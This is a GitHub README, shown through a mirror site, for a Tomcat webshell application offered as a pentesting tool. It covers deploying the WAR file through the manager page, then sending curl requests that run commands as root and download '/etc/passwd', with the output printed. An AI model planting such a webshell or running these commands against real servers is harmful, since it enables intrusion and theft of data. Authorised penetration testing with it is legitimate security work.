Movatterモバイル変換

[0]ホーム
URL:

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

 Sign up
Appearance settings

A webshell application and interactive shell for pentesting Apache Tomcat servers.

NotificationsYou must be signed in to change notification settings

p0dalirius/Tomcat-webshell-application

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

A webshell application and interactive shell for pentesting Apache Tomcat servers.
GitHub release (latest by date)YouTube Channel Subscribers

Features

  • Webshell plugin for Apache Tomcat.
  • Execute system commands via an API with?action=exec.
  • Download files from the remote system to your attacking machine?action=download.

Usage

Requirements: You need to have the credentials of an high privilege account of the Apache Tomcat server.

Step 1: Access the Tomcat manager and upload the webshell plugin

First of all, you will need to access the Apache Tomcat/manager page athttp://127.0.0.1:10080/manager/html, and connect to it with an high privilege account of the Apache Tomcat server.

Then choose the WAR file of the webshell plugin and click on "Deploy":

And the application is deployed:

Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request tohttp://127.0.0.1:10080/webshell/api.jsp withaction=exec&cmd=id:

$ curl -X POST'http://127.0.0.1:10080/webshell/api.jsp' --data"action=exec&cmd=id"{"stdout":"uid=0(root) gid=0(root) groups=0(root)\n","stderr":"","exec":["/bin/bash","-c","id"]}

You can also access it by a GET request from a browser:

Step 2.2: Downloading files

You can also download remote files by sending a GET or POST request tohttp://127.0.0.1:10080/webshell/api.jsp withaction=download&cmd=/etc/passwd:

$ curl -X POST'http://127.0.0.1:10080/webshell/api.jsp' --data"action=download&path=/etc/passwd" -o-root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Step 3: The interactive console

When your webshell is active, you can now use the interactiveconsole.py to execute commands and download remote files.

demo.mp4

Development

If you need to compile this plugin, you can use the docker image provided, simply typemake to build your plugin present in thewebshell folder. Output WAR files will be put in the./webshell/dist/ folder.

Then if you need to test the plugin locally, you can start an Apache Tomcat instance with the test environnement in./test_env/.

References

[8]ページ先頭
©2009-2025 Movatter.jp